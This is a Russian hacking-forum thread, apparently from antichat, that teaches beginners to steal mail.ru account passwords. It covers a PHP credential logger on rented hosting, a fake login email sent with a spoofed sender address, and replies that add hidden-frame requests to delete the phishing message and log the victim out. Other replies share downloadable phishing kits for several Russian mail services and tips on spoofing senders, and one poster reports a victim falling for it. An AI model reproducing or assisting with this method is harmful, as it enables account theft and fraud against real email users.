Взлом почты на mail.ru [СИ]
 

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.


Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
Рассмотрим скрипт поподробнее:
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

• Сохраним в файл mes.php и зальем на хостинг.

• Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777

Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.


Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!

видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка

А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5...45defdb59.jpeg

так дополняй скорее свою статью
:(

Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...

Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.

XSS или XSS + ФЕЙК ...

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

А я соглашусь с ufoPlast, все он правильно сказал.

ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

Вообщем мну предпочитает яндекс. :)
Хотя мэйл тоже слабо защищен...

а что мешает "анонимно" послать мыло от admin@yandex.ru ?

Тема немного старовата, но я вставлю свои 5 копеек :)
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма
Это сносит письмо насмерть :D
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним :)

Не тестировал, токо частично, должно работать... :)
Протестировал, работает :D
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно :D

молодец, уделил время, написал. ну, что - + вообщем

Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия :)

В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать

В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер :)

Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу :D
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? :cool:
:D
P.S> Впервые этим занимаюсь и просто от нечего делать :)
=========
Гы гы, чел в аське повёлся :D Мля, а это работает оказывается :)))
Кстате в .htaccess пропишите
Ато не кайф если логи прочитают

понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))

Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

<h1>Ты грязный овце*б :D </h1>
<img src="http://win.mail.ru/cgi-bin/logout">

Такое западло :) Но можно будет удалить письмо из списка :(

Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?

Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

за старания держи +1 конечно, но написал боле интереснее функцию

Я отправляю из отбук экспресс и нет почему-то хтмл кода, тока тхт, помогите, вот код который я пытаюсь отправить:

ссылка для анонимной отправки почты не работает, подскажите как их отправлять анонимно, со вставкой html кода (желательно скрипт)

и если мона то опишите как отправить уже обработанною

Alekzzzander держи скрипт http://webfile.ru/2230234

можете кто нить скрипты выложить(которые на хостинг надо заливать?

_http://webfile.ru/2351393
там четыре фейка, майл.ру, яндекс, юкоз и рамблер ;)

Перевыложи пожалуйста архив со скриптами, очень надо!

Да, перезалейте плиз. И подскажите хостинг платный, но не очень дорогой для этих целей.

http://slil.ru/26316711

Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?

расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата

насчет скрипта тут гдето в этой теме видел, но адрес он там не подменяет.

Я Crazy mail юзаю

дай ссылку где дернуть его мона, желательно с мануалом!

Вот крейзи мейл , но сейчас помойму их бесплатный серв если и работает то редко.
_http://depositfiles.com/ru/files/3394597

iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?

перезайлете куданить например на дамп а то оттуда некачает.

раз http://webfile.ru/2379569
дваз http://www.mediafire.com/?yenwmttnmty

а нету у кого нить для отправки писем в html ? а то тот скрипт что в посте выше отправляет в txt.